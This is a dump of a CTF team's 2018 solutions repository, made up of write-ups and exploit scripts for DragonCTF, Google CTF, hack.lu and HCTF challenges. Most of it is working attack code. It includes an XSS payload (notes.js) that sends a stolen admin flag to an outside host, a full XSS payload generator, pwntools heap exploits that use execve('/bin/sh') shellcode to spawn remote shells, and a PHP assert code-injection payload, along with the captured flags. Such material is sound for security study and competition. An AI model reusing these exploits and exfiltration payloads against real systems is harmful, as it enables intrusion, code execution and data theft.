``http://10.62.20.153:3000``, so we can't get flag by ``http://nodepad.hackable.software:3000``, we need request ``http://10.62.20.153:3000/admin/flag`` here. Finally, flag is ``DrgnS{Ar3_Y0u_T3mP14t3d?}``. You can see my [script](https://github.com/0ops/ctfs/blob/master/2018/dragonctf-2018/web/Nodepad/cli.py) and [notes.js](https://github.com/0ops/ctfs/blob/master/2018/dragonctf-2018/web/Nodepad/notes.js) in this repo. ================================================ FILE: 2018/dragonctf-2018/web/Nodepad/cli.py ================================================ #!/usr/bin/env python # -*- coding: utf-8 -*- import json from saker.main import Saker class Cli(Saker): def __init__(self, url): super(Cli, self).__init__(url) self.token = "" def getToken(self): self.token = self.lastr.content.split('name="_csrf" value="')[1].split('"')[0] def login(self, username, password="test"): self.get("login") self.getToken() data = { "name": username, "password": password, "_csrf": self.token } self.post("login", data=data) self.getToken() def addNotes(self, title, content=""): data = { "title": { "a": title }, "content": content, "_csrf": self.token } headers = { "Content-type": "application/json" } self.post("notes/new", data=json.dumps(data), headers=headers) print(self.lastr.content) if __name__ == '__main__': url = "http://nodepad.hackable.software:3000" # site url c = Cli(url) c.login("rebirth", "rebirth") c.addNotes("") ================================================ FILE: 2018/dragonctf-2018/web/Nodepad/notes.js ================================================ fetch('http://10.62.20.153:3000/admin/flag').then((res) => { res.text().then((text) => { location.href = 'http://vps.addr/?flag=' + encodeURI(text); }); }) ================================================ FILE: 2018/google-2018/web/gcalc/README.md ================================================ # gCalc `Author: SYM01` gCalc is an XSS challenge in Google CTF 2018. The details can be referred to the [Orange's blog](http://blog.orange.tw/2018/06/google-ctf-2018-quals-web-gcalc.html). Orange's solution is concise and powerful. But I use another way to build the payload, a more complex one. ## How? Focus on the following regex: ```javascript /^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/ ``` We can use `/`, `+`, `(`, `)`, any number and any lowercase words leading with `.`. It's enough for us to build the payload. Examples: ```javascript // to get "return " /.return /.source.substr(1) // to get "C" /0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift() // to get "String.fromCharCode(48)" /(0+(1.zthis)).constructor.from.yhar.yode(48)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift()) ``` We can finally invoke `String.fromCharCode()`. On the basis of the above, we can build any payloads. ## Exploit We use the following script to generate the final payload. ```python #!/usr/bin/env python3 import sys fromCharCode_tpl = r'/(0+(1.zthis)).constructor.from.yhar.yode({})/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())' sep = r'+/1+/.source.substr(1)+' def encode(c:str)->str: return fromCharCode_tpl.format(ord(c)) payload = sep.join(map(encode, sys.argv[1])) print(r'/0/.constructor.constructor(/0/.constructor.constructor(/.return /.source.substr(1)+{})())()'.format(payload)) ``` By using the upper script, we can generate the payload for `alert(/0ops/)`: ```javascript /0/.constructor.constructor(/0/.constructor.constructor(/.return /.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(97)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(108)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(101)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(114)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(116)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(40)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(47)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(48)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(111)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(112)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(115)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(47)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift())+/1+/.source.substr(1)+/(0+(1.zthis)).constructor.from.yhar.yode(41)/.source.split(/.z/).join().split(/.y/).join(/0/.constructor.constructor(/.return /.source.substr(1)+/.escape((1+(1.zthis)).sub())/.source.split(/.z/).join().substr(1))().substr(2).split(/.u/).shift()))())() ``` It's quite annoying. XD. ================================================ FILE: 2018/google-2018/web/gcalc/app.js ================================================ var e = "function" == typeof Object.assign ? Object.assign : function (a, b) { for (var c = 1; c < arguments.length; c++) { var d = arguments[c]; if (d) for (var f in d) Object.prototype.hasOwnProperty.call(d, f) && (a[f] = d[f]) } return a }, g = "function" == typeof Object.defineProperties ? Object.defineProperty : function (a, b, c) { a != Array.prototype && a != Object.prototype && (a[b] = c.value) }, h = "undefined" != typeof window && window === this ? this : "undefined" != typeof global && null != global ? global : this; function k(a) { if (a) { for (var b = h, c = ["Object", "assign"], d = 0; d < c.length - 1; d++) { var f = c[d]; f in b || (b[f] = {}); b = b[f] } c = c[c.length - 1]; d = b[c]; a = a(d); a != d && null != a && g(b, c, { configurable: !0, writable: !0, value: a }) } } k(function (a) { return a || e }); function l(a, b, c, d, f) { this.location = a; this.c = b; this.mdDialog = d; this.f = f; n(this); a = a.search(); if (a.expr && a.vars) try { var m = p(a.expr, a.vars); this.a = this.screen = ""; q(this, m); this.b.ans = parseFloat(m) || 0 } catch (v) { q(this, "Error") } } l.$inject = ["$location", "$http", "$httpParamSerializer", "$mdDialog", "vcRecaptchaService"]; function q(a, b) { a.screen = a.a ? a.screen + b : b } function n(a) { a.screen = "0"; a.a = ""; a.b = { pi: 3.14159, ans: 0 } } function p(a, b) { a = String(a).toLowerCase(); b = String(b); if (!/^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/.test(a)) throw Error(a); b = JSON.parse(b, function (a, b) { if (b && "object" === typeof b && !Array.isArray(b)) return Object.assign(Object.create(null), b); if ("number" === typeof b) return b }); return (new Function("vars", "return " + a))(b) } function r(a) { try { return p(a.a, JSON.stringify(a.b)) } catch (b) { return "Error" } } function t(a) { var b = new URL("https://gcalc2.web.ctfcompetition.com"); b.pathname = "/"; b.searchParams.set("expr", a.a); b.searchParams.set("vars", JSON.stringify(a.b)); return b + "" } l.prototype.permalink = function () { this.mdDialog.show(this.mdDialog.alert({ title: "Link", htmlContent: t(this), ok: "Ok" })) }; l.prototype.showCaptcha = function () { this.mdDialog.show({ contentElement: "#captchaDialog", parent: angular.element(document.body) }) }; l.prototype.cloud = function () { var a = this.f.getResponse(); a ? (this.c({ method: "POST", url: "/report", data: { expr: this.a, vars: JSON.stringify(this.b), recaptcha: a } }), this.mdDialog.hide()) : alert("Wrong captcha.") }; l.prototype.btnClick = function (a) { if (/[0-9.]/.test(a)) q(this, a), this.a += a; else if (/[*\/+%-]/.test(a)) q(this, " " + a + " "), this.a += a; else if (/[(]/.test(a)) q(this, " " + a), this.a += a; else if (/[)]/.test(a)) q(this, a + " "), this.a += a; else if ("\u03c0" == a) q(this, " \u03c0 "), this.a += " vars.pi"; else switch (a) { case "ac": n(this); break; case "ans": q(this, " Ans "); this.a += " vars.ans"; break; case "=": if (!this.a) break; a = r(this); this.a = this.screen = ""; q(this, a); this.b.ans = parseFloat(a) || 0; break; case "pow": if (!this.a) break; a = r(this); a *= a; this.screen = ""; this.a = parseFloat(a) || 0; q(this, a); this.b.ans = parseFloat(a) || 0; break; case "sqrt": this.a && (a = Math.sqrt(r(this)), this.screen = "", this.a = parseFloat(a) || 0, q(this, a), this.b.ans = parseFloat(a) || 0) } }; function u(a) { a.html5Mode(!0) } u.$inject = ["$locationProvider"]; angular.module("calcApp", ["ngMaterial", "ngMessages", "ngSanitize", "vcRecaptcha"]).controller("CalcCtrl", l).config(u); ================================================ FILE: 2018/hacklu-2018/crypto/relate/exp.py ================================================ __author__ = "polaris" from pwn import * p = remote("arcade.fluxfingers.net",1821) def ADD(a): p.recvuntil("-----------------------------*") p.sendline("ADD") p.recvuntil(" >>> ") p.sendline(hex(a)[2:]) p.recvuntil("Ciphertext is ") return p.recvline().strip()+p.recvline().strip() def XOR(a): p.recvuntil("-----------------------------*") p.sendline("XOR") p.recvuntil(" >>> ") p.sendline(hex(a)[2:]) p.recvuntil("Ciphertext is ") return p.recvline().strip()+p.recvline().strip() res = "" for i in range(16*8): a = ADD(1<>> ") p.sendline(aaa) p.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/babyexploit/exp.py ================================================ from pwn import * r = remote('arcade.fluxfingers.net', 1807) r.sendlineafter(':', 'bc') r.sendlineafter(':', '3') sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" sc += '\xcc'*(0x27 - len(sc)) sc += '\xeb\xd7' sc += '\xdd'*(0x2e - len(sc)) sc = bytearray(sc)[::-1] for i in xrange(len(sc)-1): sc[i+1] ^= sc[i] sc = sc[::-1] r.sendlineafter(':', str(sc)) r.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/heap_heaven_2/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './heap_heaven_2' TARGET = ('127.0.0.1', 2333) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def w(offset, data): r.sendlineafter('exit\n', '1') r.sendlineafter('How much do you want to write?\n', str(len(data))) r.sendlineafter('At which offset?\n', str(offset)) r.send(data) def f(offset): r.sendlineafter('exit\n', '3') r.sendlineafter('At which offset do you want to free?\n', str(offset)) def l(offset): r.sendlineafter('exit\n', '4') r.sendlineafter('At which offset do you want to leak?\n', str(offset)) return r.recvline()[:-1] code = ELF(BINARY) libc = ELF(LIBC64) # fill the tcache w(0x1008, p64(0x101)) for i in xrange(7): f(0x1010) w(0x1108, p64(0x21)) w(0x1128, p64(0x21)) f(0x1010) #attach(0x15ff) #attach(0x1664) # leak heap base heap_base = u64(l(0x1010).ljust(8, '\x00')) - 0x290 log.info('heap base = %#x' % heap_base) # leak code base w(0x1010, p64(heap_base + 0x280)) code.address = u64(l(0x1010).ljust(8, '\x00')) - 0x1670 log.info('code base = %#x' % code.address) # leak self mmap w(0x1010, p64(heap_base + 0xc0)) self_mmap = u64(l(0x1010).ljust(8, '\x00')) - 0x1010 log.info('self mmap = %#x' % self_mmap) # leak libc base w(0x1010, p64(code.got['puts'])) libc.address = u64(l(0x1010).ljust(8, '\x00')) - libc.sym['puts'] log.info('libc base = %#x' % libc.address) # fix up w(0x1010, p64(libc.address + 0x1e4ca0)) # unlink to edit mmaped to &mmaped-0x18 mmaped = code.address + 0x4048 w(0x8, p64(0x101)) w(0x10, p64(mmaped - 0x18) + p64(mmaped - 0x10)) w(0x100, p64(0x100)*2) w(0x208, p64(0x21)) w(0x228, p64(0x21)) f(0x110) # edit mmaped to heap base w(0x18, p64(heap_base)) # edit vtable function w(0x280, p64(libc.address + 0xe75f0)) # trigger r.sendline('5') r.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/heap_hell/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './heap_hell' TARGET = ('arcade.fluxfingers.net', 1810) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def w(offset, size, data): r.sendlineafter('exit\n', '1') r.sendlineafter('How much do you want to write?\n', str(size)) r.sendlineafter('At which offset?\n', str(offset)) r.send(data) def f(offset): r.sendlineafter('exit\n', '2') r.sendlineafter('At which offset do you want to free?\n', str(offset)) def l(offset): r.sendlineafter('exit\n', '3') r.sendlineafter('At which offset do you want to leak?\n', str(offset)) return r.recvline()[:-1] code = ELF(BINARY) libc = ELF(LIBC64) # self mmap mmap_base = 0x10000 r.sendlineafter(')?\n', str(mmap_base)) # fill the tcache w(0x8, 8, p64(0x101)) for i in xrange(7): f(0x10) #attach(0x14c8) w(0x108, 8, p64(0x101)) w(0x208, 8, p64(0x101)) f(0x10) # leak libc base libc.address = u64('\00' + l(0x11).ljust(7, '\x00')) - 0x1beb00 log.info('libc base = %#x' % libc.address) payload = fit({ 0: '/bin/sh\x00', 2920: p64(libc.sym['system']), 0x20000: '\x00'}, filler='\x00') # initial initial = 0x1bfbe0 w(libc.address + initial - 0x10000, 0x20001, payload) r.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/heap_hell_2/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * # flag{some_of_the_differences_caused_by_a_changed_bounds_check} context.terminal = ['tmux', 'splitw', '-h'] BINARY = './heap_hell_2' TARGET = ('arcade.fluxfingers.net', 1823) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def w(offset, size, data): r.sendlineafter('exit\n', '1') r.sendlineafter('How much do you want to write?\n', str(size)) r.sendlineafter('At which offset?\n', str(offset)) r.send(data) def f(offset): r.sendlineafter('exit\n', '2') r.sendlineafter('At which offset do you want to free?\n', str(offset)) def l(offset): r.sendlineafter('exit\n', '3') r.sendlineafter('At which offset do you want to leak?\n', str(offset)) return r.recvline()[:-1] code = ELF(BINARY) libc = ELF(LIBC64) # self mmap mmap_base = 0x800000 r.sendlineafter(')?\n', str(mmap_base)) # fill the tcache w(0x1008, 8, p64(0x101)) for i in xrange(7): f(0x1010) #attach(0x1594) w(0x1108, 8, p64(0x101)) w(0x1208, 8, p64(0x101)) f(0x1010) # leak libc base libc.address = u64('\00' + l(0x1011).ljust(7, '\x00')) - 0x1beb00 log.info('libc base = %#x' % libc.address) fastbin = libc.address + 0x1beb10 - 0x60 log.info('fastbin %#x' % fastbin) tls_base = libc.address + 0x1c4000 + 0x1500 #0x15c0 log.info('tls base %#x' % tls_base) # set global_max_fast target = libc.sym['global_max_fast'] - 2 w(0x0, 0x10, p64(0) + p64(0x21)) w(0x10, 0x10, p64(target-0x18) + p64(target-0x10)) w(0x20, 0x10, p64(0x20) + p64(0x100)) w(0x120, 0x10, p64(0) + p64(0x21)) w(0x140, 0x10, p64(0) + p64(0x21)) f(0x30) # edit __pointer_chk_guard_local offset = ((tls_base + 0x30) - fastbin) * 2 + 0x20 w(0x200, 32, ''.join(map(p64, [0, 0] + [0, offset]))) w(0x200 + 0x10 + offset, 32, ''.join(map(p64, [0, 0x11] + [0, 0x11]))) f(0x200 + 0x20) cookie = u64(l(0x200 + 0x20).ljust(8, '\x00')) log.info('__pointer_chk_guard_local %#x' % cookie) # edit _GI___call_tls_dtors offset = ((tls_base - 0x58 ) - fastbin) * 2 + 0x20 w(0x300, 32, ''.join(map(p64, [0, 0] + [0, offset]))) w(0x300 + 0x10 + offset, 32, ''.join(map(p64, [0, 0x11] + [0, 0x11]))) f(0x300 + 0x20) # fake tls_dtor_list func = libc.sym['system'] func = func ^ (mmap_base + 0x210) func = ((func << 17) | (func >> 47)) & (2 ** 64 - 1) w(0x310, 0x10, ''.join(map(p64, [func, libc.search('/bin/sh\x00').next()]))) # trigger r.sendline('4') r.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/slot_machine/exp1.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './slot_machine' TARGET = ('127.0.0.1', 2333) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def m(size): r.sendlineafter('[ 4 ] : bye!\n', '1') r.sendlineafter('How much?\n', str(size)) def f(idx): r.sendlineafter('[ 4 ] : bye!\n', '2') r.sendlineafter('where?\n', str(idx)) def w(data): r.sendlineafter('[ 4 ] : bye!\n', '3') r.sendafter('what?\n', data) code = ELF(BINARY) libc = ELF(LIBC64) r.recvuntil('Here is system : ') libc.address = int(r.recvuntil('\n')[:-1], 16) - libc.sym['system'] log.info('leak libc address 0x%x' % libc.address) #attach(0x13ee) #attach(0x1242) m(100) f(0) f(0) m(100) w(p64(libc.address + 0x1c4000)) #link_map m(100) m(100) w(p64(libc.address + 0x45254 - 0x3a570 )) r.interactive() ================================================ FILE: 2018/hacklu-2018/pwn/slot_machine/exp2.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './slot_machine' TARGET = ('127.0.0.1', 2333) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def m(size): r.sendlineafter('[ 4 ] : bye!\n', '1') r.sendlineafter('How much?\n', str(size)) def f(idx): r.sendlineafter('[ 4 ] : bye!\n', '2') r.sendlineafter('where?\n', str(idx)) def w(data): r.sendlineafter('[ 4 ] : bye!\n', '3') r.sendafter('what?\n', data) code = ELF(BINARY) libc = ELF(LIBC64) r.recvuntil('Here is system : ') libc.address = int(r.recvuntil('\n')[:-1], 16) - libc.sym['system'] log.info('leak libc address 0x%x' % libc.address) #attach(0x13d4) #attach(0x1424) m(0x3a0) f(0) f(-528) m(0xf0) w(p64(libc.sym['__free_hook'])) m(0x10) w(p64(libc.address + 0xe75f0)) f(0) r.sendline('cat flag') r.interactive() ================================================ FILE: 2018/hacklu-2018/web/BabyPHP/README.md ================================================ After access this site, we will see [source code](https://github.com/0ops/ctfs/blob/master/2018/hacklu-2018/web/BabyPHP/index.php) here, we can know this is a typical PHP trick challenge. ## Part One: PHP Wrapper ```php @$msg = $_GET['msg']; if(@file_get_contents($msg)!=="Hello Challenge!"){ die('Wow so rude!!!!1'); } ``` At first, we need to find an input which satisfies the above conditions. In here, we need PHP wrapper. PHP can read something like ``php://input`` / ``data://text/plain;xxx`` and some other things as file. For example, ``file_get_contents("data://text/plain,Hell Challenge!")`` will return ``Hello Challenge!`` here, so we can solve this part by use ``data://text/plain,Hell Challenge!`` as payload. ## Part Two: Weak Type ```php @$k1=$_GET['key1']; @$k2=$_GET['key2']; $cc = 1337;$bb = 42; if(intval($k1) !== $cc || $k1 === $cc){ die("lol no\n"); } ``` After that, we need to find a k1 which ``intval($k1) == $cc`` and ``$k1 !== $cc``, this is easy, when we post some thing, PHP will use it as string, so ``1337`` is enough here. ## Part Three: UTF8 ```php if(strlen($k2) == $bb){ if(preg_match('/^\d+$/', $k2) && !is_numeric($k2)){ if($k2 == $cc){ @$cc = $_GET['cc']; } } } ``` At first glance, we need to find a k2 which only have digit here, but is not number by PHP's ``is_numeric`` function. But this challenge use ``$`` rather than ``$``, so ``000000000000000000000000000000000001337$`` would be cool. ## Part Four: Variable Coverage ```php if(substr($cc, $bb) === sha1($cc)){ foreach ($_GET as $lel => $hack){ $$lel = $hack; } } ``` In PHP, you can use ``$$`` to get a dynamic variable. For example: ```php $b = true; $a = 'b'; $$a = false; var_dump($b); // false here ``` Therefore we can change some variable here. However, we need bypass this check ``substr($cc, $bb) === sha1($cc)`` first. We need another PHP trick here. When we post an array, ``substr`` / ``sha1`` will return ``NULL`` but not throw error here, so send ``cc[]=1`` will bypass this check. ## Part Five: Evil Assert After satisfying the above conditions, we found that the code to print the flag was commented. But it doesn't matter, we have ``assert`` here! Assert will execute the string passed in, and we can control all variable with variable coverage part. Finally, our payload is ``https://arcade.fluxfingers.net:1819/?bb=print_r%28%24flag%29%3B%2F%2F&key2=000000000000000000000000000000000001337%EF%BC%84&key1=1337&k1=2&cc%5B%5D=&msg=data%3A%2F%2Ftext%2Fplain%2CHello+Challenge%21``. ================================================ FILE: 2018/hacklu-2018/web/BabyPHP/index.php ================================================ $hack){ $$lel = $hack; } } $‮b = "2";$a="‮b";//;1=b if($$a !== $k1){ die("lel no\n"); } // plz die now assert_options(ASSERT_BAIL, 1); assert("$bb == $cc"); echo "Good Job ;)"; // TODO // echo $flag; ================================================ FILE: 2018/hctf-quals-2018/blockchain/ez2win/exp.md ================================================ ## ez2win 调用_transfer,从owner转钱过来,再payforflag ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_game/challenge.py ================================================ from Crypto.Util.strxor import strxor import base64 import random def enc(data, key): key = (key * (len(data) / len(key) + 1))[:len(data)] return strxor(data, key) poem = open('poem.txt', 'r').read() flag = "hctf{xxxxxxxxxxx}" with open('cipher.txt', 'w') as f: f.write(base64.b64encode(enc(poem, flag[5:-1]))) f.close() ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_game/cipher.txt ================================================ ciMbOQxffx0GHQtSBB0QSQIORihXVQAUOUkHNgQLVAQcAVMAAAMCASFEGQYcVS8BNh8BGAoHFlMAABwCTSVQC2UdMQx5FkkGEQQAAVMAAQtHRCNLF0NSORscMkkaHABSExIYBQseUmBCFgtSKwEWfwELFRcGbzwEDABHVS8DDAcXfwUcMQwCDUUBCgYYSQEBATNKGwQeOkkbPhsYERYGDB0TYzwCUSVCDE8dKh0BNg4GAAkLSVMWHBpHQCxQF08AOhkWPh1OAA0XRQQRBQJKQyVKFghSMA95Gh8LGhEHBB8YEE4UViFaEQEVfwAdfx0GEUUWAAARGxpHTiFQERx4FkkROgUHERMXRTpUCANtYy9RFk8TLEkHNwxOFhcbAhsASR0STC1GCk8UMwYEOhsdfiEdRR0bHU4QSDRLHR0XO0kGMQ0LEgATERYQSQgORDJaWAsXMgYdfxsbGAB4LRYVGxpHUyFXHU8TMQ1TPRsLFREaDB0TSRoIASJGGR1SKwEWfwUBFQFSChVUHQYCASNWFQ0XLRocMgxkNgoAABd+PRkIKwkDEAoTLQ1TKwELVAgHFhoXRU4BUy9OWBsaOkkeMAYAVAQcAVMXCBwEQDNQci4HJwAfNggcDUUXHQcGDAMCASFGCxsaOh0aPAAdGUUQBBoASRoIASNCCBsHLQxTMgAdABx4IxoYBQcJRmBXEApSNgcHOgcdEUUeDBURRU4FVDQDGQMBMEkVNgUCHQsVRQccDE4XVDJGcjsaOhsWfwgcEUUTCQQVEB1HTCVOFx0bOhpTKwEcGxAVDRwBHU4TSSUDHQ4AKwF5FkkMEQkbAAURSSdHQC0pPAYXO0kSLEkaHABSFAYdDBpHQyVCDRsLfwYVfwgbABAfC1MYDA8RRDMpKwcXMQ5TNhpOGgoGRRAcCAEUDWBQFQAZOkkUOhoaARcXbzYCDABHVilPDE8TMxocfxsLAAQbCxYQSQwITyUDCB0dKg0fJkk/HQsVRTURBwlHTDVQGwMXVSYQPBwCAG8mDQERDGQuAShGGR1SMwYFOkVOPUUQAB8dDBgCASlNWAMdKQx5EwYYEUUbFlMVSR4ITiwDFwlSLB0BKg4JGAwcAlMWBRsCDCdRHQocfwgfOAgLfiQBRRcRGgELQDRGWAIbPBsccgsbBhYGRRwSSRkOTyQpOgMXOg0aMQ5OAA0ACgYTAU4KWGBVHQYcLGMqOggcB0UBERIAAAEJRCQDEQFSKwEWfwsLGAwXA3kyBhsVKwkDGgoeNgwFOkkaHAQGRRIYBU4EQC4DEAoTLWM2KQwAVAQcERoXAB4GVSUDHAYBPBsWKwxCVCxSCBYASRoPRGBMDAcXLUkHNwwHBkUdEh1+OgEKRGBAGQFSMQYHfw4cFRYCRQccDE4KTi1GFht4EwwVK0kaG0UGDRZULA8UVWBXF08VMEkkOhoaWEUGDRZUDQsGRWBODRwGfwccK0kcEREHFx1UHQFHTy9UEAoAOmMgOgxCVCxSEhYVG049QC4DPgMdKAwBLEkBGkUfHFMcDA8DDWBKFk8UKgUffwsCGwofRRIYBgAAATRLHU8FPhBTPgUCVBEaAFMDCBdtZzJGCRoXMR0fJkkDHRYBABdUGgEKRGwDGhoGfwgfLAZOEAAXFR8NSQMIVyVHWA0Lfx4aMQ1CVAMACgAARU4UTy9UWAAAfxsSNgdkMgwEAHkkGw8NTyEDKA4APgQaKwhCVBYdCh1UCB1HUi9MFk8TLGMfNg8LVAcXRRERCBsTSCZWFE8eNgIWfxobGQgXF1MSBQEQRDJQWA4cO0kXOggaHEUeDBgRSQ8SVTVOFk8eOggFOhpkNQkBClMXCBwCASFBFxoGfx4bPh1OHAQB ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_game/exp.py ================================================ __author__ = "polaris" import base64 from Crypto.Util.strxor import strxor import string data = "" with open("cipher.txt","rb") as f: data = f.read().strip() data = base64.b64decode(data) print len(data) lll = 11 """ table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,.? \n\r" for lll in range(1,50): print lll data2 = [data[i:i+lll] for i in range(0,len(data),lll)] for i in range(256): flag = True for d in data2: c = chr(i^ord(d[0])) if c not in table: flag = False break if flag: raw_input(i) """ # xor_is_interesting!@#xor_is_interestin @# lll = 42 res = [ord(" ") for i in range(42)] data2 = [data[i:i+lll] for i in range(0,len(data),lll)] table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,.? \n\r" for index in range(len(data2[0])): for i in range(256): flag = True for dd in range(len(data2)-1): d = data2[dd] c = chr(i^ord(d[index])) if c not in string.printable: flag = False break if flag: raw_input((index,chr(i),c)) res[index]=chr(i) print len(res) print bytearray(res) ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_rsa/rsa.py ================================================ from Crypto.Util.number import * import SocketServer import string import hashlib import random import requests import json from flag import * class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass class RSATCPHandler(SocketServer.BaseRequestHandler): def handle(self): self.request.sendall("Welcome to flag getting system\ngive me your token > ") token = self.request.recv(1024).strip() if not verify(token): self.request.sendall("token error\n") else: p = getStrongPrime(1024) q = getStrongPrime(1024) n = p * q e = 5 nbits = size(n) kbits = nbits // (2 * e * e) m1 = getRandomNBitInteger(nbits) m2 = m1 ^ getRandomNBitInteger(kbits) c1 = pow(m1, e, n) c2 = pow(m2, e, n) self.request.sendall("n=" + str(n) + "\n") self.request.sendall("c1=" + str(c1) + "\n") self.request.sendall("c2=" + str(c2) + "\n") self.request.sendall("now give me you answer\n") ans1 = self.request.recv(2048).strip() 